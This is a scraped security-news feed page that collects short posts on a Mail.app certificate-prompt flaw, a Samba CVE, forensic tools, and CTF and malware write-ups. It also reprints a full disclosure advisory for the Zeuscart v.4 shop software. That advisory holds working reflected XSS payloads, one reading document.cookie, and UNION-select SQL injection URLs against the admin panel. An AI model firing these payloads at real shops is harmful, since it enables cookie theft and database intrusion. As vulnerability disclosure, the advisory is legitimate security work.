Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Apple OS X: Don't trust, and don't prompt to trust certificates

$
0
0
Summary:

It is essential to provide a configuration option in the operating system
to:
1. never trust invalid certificates, and
2. to not prompt to trust them.


Steps to reproduce:

1. Install OS X on an Apple laptop.
2. Configure Mail.app (for example) to connect over SSL to your mail
server. Prepare a draft email with sensitive information about the
iPhone 8 or whatever.
3. Go treat yourself to a hotel visit.
4. Connect to the hotel Wifi SSID but do not pay or authenticate yet.
5. The dialog appears: "Verify Certificate. Mail can't verify the
identity of "your.secure.server.apple.com". The certificate for this
server is invalid. You might be connecting to a server that is
pretending to be "foo" which could put your confidential information
at risk. Do you want to connect to the server anyway?"
6. Accidentally click "Continue"
7. Send your sensitive email.


Remarks:

Networks implemented with a walled garden, or a malicious fake network
returning false DNS responses will both behave in the same way.  DNS
responses and any TCP responses are liable to be completely fake data.
In the case of the hotel network, until authentication every IP
address and HTTP response probably resolves to the Wifi login service.
Likewise, outbound SSL connections will return some sort of fake
response, including an invalid certificate, until you establish the
hotel's Wifi service.

In the alternate case of a malicious Wifi network, only a specified
subset of responses need to be fabricated, but clearly these would be
tailored by the attacker to steal or modify private data.

The certificate mechanism is the last line of defense for the end user
against such a Man-in-the-middle attack. To override the default trust
with a quick click of a "Connect" button robs the average user of a
reasonable level of protection from the operating system.

Further, the text "DO YOU WANT TO CONNECT TO THE SERVER ANYWAY?" and
the placement of the "Connect" button make it seem like a default
option and for the user who TL;DR the last sentence actually reads
like a goading suggestion.  A Google search of the error message
confirms, most users are concerned with clicking through the dialog
rather than their data privacy.


Expected Results:

1. For practical purposes, if the Mail.app program is configured with
SSL, then it does not actually have a connection to the mail server.
This is evident in the certificate mismatch itself.

2. User actions with high security implications should default to
secure options and should require a positive and unequivocal input for
setting any dangerous configuration.

3. A maximally secure, but still functional, setting should be possible.


Actual Results:

1. The Mail.app program connects to the invalid server once the user
clicks "Connect", or inadvertently types the Enter key at the same
time the dialog pops up.

2. In the case of a malicious Wifi network, the sensitive email has
now been sent to the Man-in-the-middle attacker.

3. It is not even possible to configure OS X to simply reject invalid
certificates outright.



Proposed changes:

1. Change the dialog box so it is much more difficult to ACCIDENTALLY
accept the invalid certificate;

2. Provide a global configuration option for the system administrator,
that trusts only a whitelist of mismatched certificates, and silently
rejects any other invalid SSL connection attempt.



Authored by Douglas Held
Email: risk@douglasheld.net

Hidden in Plain Sight - Public Key Crypto

$
0
0
How is it possible for us to communicate securely when there’s the possibility of a third party eavesdropping on us? How can we communicate private secrets through public channels? How do such techniques enable us to bank online and carry out other sensitive transactions on the Internet while trusting numerous relays? In this post, I hope to explain public key cryptography, with actual code examples, so that the concepts are a little more concrete.

more here...........http://nickdesaulniers.github.io/blog/2015/02/22/public-key-crypto-code-example/

ECommerce-Shopping Cart Zeuscart v. 4: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities

$
0
0
Advisory: Multiple reflecting XSS-, SQLi and
InformationDisclosure-vulnerabilities in Zeuscart v.4
Advisory ID: SROEADV-2015-12
Author: Steffen Rösemann
Affected Software: Zeuscart v.4
Vendor URL: http://zeuscart.com/
Vendor Status: pending
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Software used for research: Mac OS X 10.10, Firefox 35.0.1

==========================
Vulnerability Description:
==========================

ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and
InformationDisclosure-vulnerabilities.

==================
Technical Details:
==================

====
XSS
===

Reflecting XSS-vulnerabilities can be found in a common
Zeuscart-installation in the following locations and could be exploited for
example by crafting a link and make a registered user click on that link.

The parameter "search", which is used in the index.php is vulnerable to
XSS-attacks.

Exploit-Example:

http://
{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--

By appending arbitrary HTML- and/or JavaScript-code to the parameter
"schltr" which is as well used in index.php, an attacker could exploit this
XSS-vulnerable parameter:

Exploit-Example:

http://
{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

The third XSS-vulnerability can be found in the "brand"-parameter, which is
again used in index.php.

Exploit-Example:

http://
{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E

====
SQLi
====

The SQL injection-vulnerabilities can be found in the administrative
backend of Zeuscart v. 4 and reside in the following locations in a common
installation.

By appending arbitrary SQL statements to the "id"-parameter, an attacker
could exploit this SQL injection vulnerability:

Exploit-Example:

http://
{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+

Another SQL injection vulnerability can be found here and can be exploited
by appending SQL statements to the vulnerable "cid"-parameter:

Exploit-Example:

http://
{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+

The last SQL injection vulnerability I found can be found in the following
location and can be exploited by appending SQL statements to the vulnerable
"id" parameter:

http://
{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+

==============
Information Disclosure
==============

The administrative backend of Zeuscart v. 4 allows the admin to use a
functionality, which displays the PHP-installation settings via phpinfo():

http://{TARGET}/admin/?do=getphpinfo

Unfortunately, the PHP-script does not check, if an authorized admin
executes this functionality: It is possible even for unregistered users to
request the above link to see the informations, phpinfo() displays. That
could expose sensitive informations to an attacker which could lead to
further exploitation.



=========
Solution:
=========

Vendor has been notified. After releasing a patch, which seems not to
correct the issues, the vendor decided not to respond anymore to figure out
a solution together. Currently, there is no patch available to secure
Zeuscart-installations.


====================
Disclosure Timeline:
====================
21-Jan-2015 – found the vulnerabilities
21-Jan-2015 - informed the developers (see [3])
21-Jan-2015 – release date of this security advisory [without technical
details]
21-Jan-2015 – fork of the repository to keep the vulnerable version
available for other researchers (see [5])
22-Jan-2015 - vendor responded, provided detailed information
04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are
still exploitable, which has been reported to the vendor (see [3])
19-Feb-2015 - asked the vendor again, if he will patch these issues (see
[3]); vendor did not respond
21-Feb-2015 - release date of this security advisory
21-Feb-2015 - send to FullDisclosure


========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://zeuscart.com/
[2] https://github.com/ZeusCart/zeuscart
[3] https://github.com/ZeusCart/zeuscart/issues/28
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
[5] https://github.com/sroesemann/zeuscart

Comodo ships Adware Privdog worse than Superfish

$
0
0
tl;dr There is an adware called Privdog that gets shipped with software from Comodo. It totally breaks HTTPS security.

more here.........https://blog.hboeck.de/archives/865-Comodo-ships-Adware-Privdog-worse-than-Superfish.html



Also here you can test your system for privdog.....https://filippo.io/Badfish/

Benchmarking some popular public sandboxes regarding their "Anti-VM" technology

$
0
0
While checking submissions on our webservice we discovered that someone uploaded a "new" version of Pafish (by a0rtega). Pafish is a demo tool that performs typical anti-VM tricks in use by common and sophisticated malware. The new version of Pafish adds a lot of new VM and system trace checks, especially for VirtualBox. As is known, VirtualBox happens to be the default analysis environment of most sandboxes (including Cuckoo Sandbox's Malwr service and our own Hybrid-Analysis.com's free malware analysis service).

more here........http://payload-security.blogspot.de/2015/02/benchmarking-some-popular-public.html

About DOMPurify 0.6.1 and Pentesters getting Pentested

$
0
0
Together with Frederic Hemberger, the Cure53 team co-maintains a DOM-only HTML, SVG and MathML sanitizer library called DOMPurify. Although it has just last year begun as an experiment, it quickly took off and is now increasingly used by more and more people as well as applications. We even benefit from it ourselves when working on various internal projects.
DOMPurify is a security library and attempts to prevent XSS attacks and other nastiness where a malicious user can control HTML that later is either used or displayed by the targeted application or website.

more here..........https://cure53.de/#dompurify-pentest-report

WinObjEx64

$
0
0
Windows Object Explorer 64-bit

WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights.


more here.........https://github.com/hfiref0x/WinObjEx64

Maximum Overkill Two - From Format String Vulnerability to Remote Code Execution

$
0
0
You might remember my first Maximum Overkill writeup, where I made a ROP exploit with ASLR/NX bypass for a simple buffer overflow exercise. I completed another over-the-top, why-would-you-even-do-this exploit for a CTF challenge and figured I’d shared it.

more here...........https://barrebas.github.io/blog/2015/02/22/maximum-overkill-two-from-format-string-vulnerability-to-remote-code-execution/

HoneyBadger- TCP attack inquisitor and 0-day catcher

$
0
0
HoneyBadger is primarily a comprehensive TCP stream analysis tool for detecting and recording TCP attacks. Perhaps it can assist in discovering 0-days and botnets.

HoneyBadger will include a variety of TCP stream injections attacks (it now includes 2) which prove that the TCP attack detection is reliable.

more here.........https://github.com/david415/HoneyBadger

Web Cryptography API Examples

$
0
0
I couldn't find anywhere that had clear examples of WebCrytoAPI, so I wrote examples and made a live table with them.

more here.........https://github.com/diafygi/webcrypto-examples

new version of autorunner v0.0.9

$
0
0
autorunner is based upon the AutoRuns tool by the Sysinternals/Microsoft gurus. It is designed to perform automated Authenticode checking for binaries designed to auto-start on a host. Its primary purpose is to aid forensic investigations.

more here..........https://github.com/woanware/autorunner

and here......https://github.com/woanware/autorunner/releases

hindsight

$
0
0
Internet history forensics for Google Chrome/Chromium

Hindsight is a free tool for analyzing the browsing history of the Google Chrome web browser. It can collect a number of different types of Chrome artifacts, including URLs, download history, bookmarks, autofill records, HTTP cookies, and Local Storage records (HTML5 cookies). Once the data is extracted from each file, it is correlated with data from other history files and placed in a timeline.

more here.......https://github.com/obsidianforensics/hindsight

Samba vulnerability (CVE-2015-0240)

$
0
0
Samba is the most commonly used Windows interoperability suite of programs, used by Linux and Unix systems. It uses the SMB/CIFS protocol to provide a secure, stable, and fast file and print services. It can also seamlessly integrate with Active Directory environments and can function as a domain controller as well as a domain member (legacy NT4-style domain controller is supported, but the Active Directory domain controller feature of Samba 4 is not supported yet).

CVE-2015-0240 is a security flaw in the smbd file server daemon. It can be exploited by a malicious Samba client, by sending specially-crafted packets to the Samba server. No authenticated is required to exploit this flaw. It can result in remotely controlled execution of arbitrary code as root.

more here.........https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

Writing your own Analyzer for the Open-Source Multi-Scanner IRMA

$
0
0
IRMA (Incident Response & Malware Analysis) is a multi-scanner framework for identifying and analyzing suspicious files. In this article, we describe, step by step, how one can contribute to this open-source project by integrating his own analyzer.

more here...........http://blog.quarkslab.com/writing-our-own-analyzer-for-the-open-source-multi-scanner-irma.html

How ESEA detects cheat software in its online gaming league - Let's get physical!

$
0
0
Before we dig in, this post should not be construed as an attack on ESEA, anti-cheat software, or fair gaming in general. It is simply an analysis thereof, detailing what the ESEA driver does on your machine. Although analysis will make attack vectors clear and obvious, no code or detailed explanation of how to leverage these points will be given.

more here.........http://everdox.blogspot.com/2015/02/how-esea-detects-cheat-software-in-its.html

Find a Phishing Site? Overwhelm it with Fake Credentials.

$
0
0
A Script preconfigured for a phishing site found today here......https://github.com/averagesecurityguy/blue/blob/master/phish_blast.py

How I Hacked Telegram’s “Encryption”

$
0
0
Telegram claims to be a privacy oriented messaging app capable of encrypting personal and business secrets – only they are not. A critical vulnerability discovered by Zimperium Mobile Security Labs exposes their more than 50 million users who believe the app provides the security to chat freely. Let me explain how we stumbled onto this vulnerability. - See more at: http://blog.zimperium.com/telegram-hack/#sthash.GRj1moLb.dpuf


Zeus Toolkit infected with a Ramnit Worm

$
0
0
RSA Research monitors and analyzes the malicious activity of online cybercrime infrastructures on an ongoing basis. In a recent discovery, the lab’s researchers studied the workings of a customized Zeus Trojan Admin panel, which had apparently picked up a Ramnit worm that infects any machine that installs the Zeus Panther Admin panel.

more here......https://blogs.rsa.com/zeus-toolkit-infected-ramnit-worm/

Neglected DNS records exploited to takeover subdomains

$
0
0
In this write up I will be talking about a security issue identified in Redbooth platform which « is a communication and collaboration platform that provides a single place for shared tasks, discussions, file sharing, and more.

As you read in the title, exploiting the issue allowed me to takedown two of their subdomains.

more here.........http://yassineaboukir.com/blog/neglected-dns-records-exploited-to-takeover-subdomains/

The Dangers of x86 Emulation: Xen XSA 110 and 105

$
0
0
Developing a secure and feature rich hypervisor is no easy task. Recently, the open source Xen hypervisor was affected by two interesting vulnerabilities involving its x86 emulation code: XSA 110 and XSA 105. Both bugs show that the attack surface of hypervisors is often larger than expected. XSA 105 was originally reported by Andrei Lutas from BitDefender. The patch adds missing privilege checks to the emulation routines of several critical system instructions including LGDT and LIDT. The vulnerable code can be reached from unprivileged user code running inside hardware virtual machine (HVM) guests and can be used to escalate guest privileges. XSA 110 was reported by Jan Beulich from SUSE and concerns insufficient checks when emulating long jumps, calls or returns.

more here..........http://www.insinuator.net/2015/02/the-dangers-of-x86-emulation-xen-xsa-110-and-105/
Viewing all 8064 articles
Browse latest View live